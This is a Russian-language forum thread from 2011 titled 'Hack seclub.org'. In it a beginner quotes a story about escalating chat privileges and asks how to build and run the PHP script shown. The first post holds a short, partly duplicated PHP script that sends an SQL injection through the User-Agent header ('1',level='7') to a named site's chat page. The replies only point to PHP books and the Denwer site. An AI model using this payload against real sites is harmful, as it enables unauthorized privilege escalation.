Взломать seclub.org
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Взломать seclub.org - 2011-07-13 15:24:10.583333
|
|
|
FanAnat
Сообщений: 2
Оценки: 0
Присоединился: 2011-07-13 15:09:41.263333
|
quote:
А с чего же все началось? Как-то раз, сидя в аське, я узнал у хорошего знакомого про то, что этот чат записывает в базу данных переменную с юзерагентом ($HTTP_USER_AGENT) без каких-либо проверок. Переварив эту инфу и зная о том, что поле с правами пользователя в БД называется «level», я решил проверить чат на sql-injection. Я накатал простенький php-скрипт, увеличивающий «level» на несколько пунктов, $fp = fsockopen("seclub.org", 80, $errno, $errstr, 30); $out = "GET /chat/chat.php?id=41711&ps=testaz&rm=4&ref=169569 HTTP/1.1\r\n"; $out .= "Host: seclub.org\r\n"; $out .= "Connection: Close\r\n"; $out .= "User-Agent: 1',level='7\r\n\r\n"; fwrite($fp, $out); fclose($fp); ?> ET /chat/chat.php?id=41711&ps=testaz&rm=4&ref=169569 HTTP/1.1\r\n"; $out .= "Host: seclub.org\r\n"; $out .= "Connection: Close\r\n"; $out .= "User-Agent: 1',level='7\r\n\r\n"; fwrite($fp, $out); fclose($fp); ?> И запустил на денвере Как сделать такой рhр-скрипт? И как запустить его на денвере?
|
|
|
RE: Взломать seclub.org - 2011-07-13 20:06:47.513333
|
|
|
zzsnn
Сообщений: 7459
Оценки: 680
Присоединился: 2007-09-25 07:17:14.240000
|
А ты знаешь что такое php, и что такое денвер?
|
|
|
RE: Взломать seclub.org - 2011-07-13 22:35:56.110000
|
|
|
FanAnat
Сообщений: 2
Оценки: 0
Присоединился: 2011-07-13 15:09:41.263333
|
quote:
ORIGINAL: zzsnn А ты знаешь что такое php, и что такое денвер? php - это скрипты встраевымые в html, типа jаvа-скриптов, а вот что такое денвер знаю смутно, хотя уже его скачал.
|
|
|
RE: Взломать seclub.org - 2011-07-13 22:38:59.490000
|
|
|
hasandudic
Сообщений: 25
Оценки: 0
Присоединился: 2010-06-25 16:53:59.086666
|
http://ru.wikipedia.org/wiki/PHP
|
|
|
RE: Взломать seclub.org - 2011-07-13 22:56:46.790000
|
|
|
zzsnn
Сообщений: 7459
Оценки: 680
Присоединился: 2007-09-25 07:17:14.240000
|
Ну что тогда можно сказать? Поищи книгу Гизберта Дамашке "PHP и MSQL", там описано как работать с этими инструментами. Не найдёшь эту книгу - ищи любую по программированию в PHP и книгу по работе с Денвер. Сайт Денвера http://www.denwer.ru/ .
|
|
|
|
|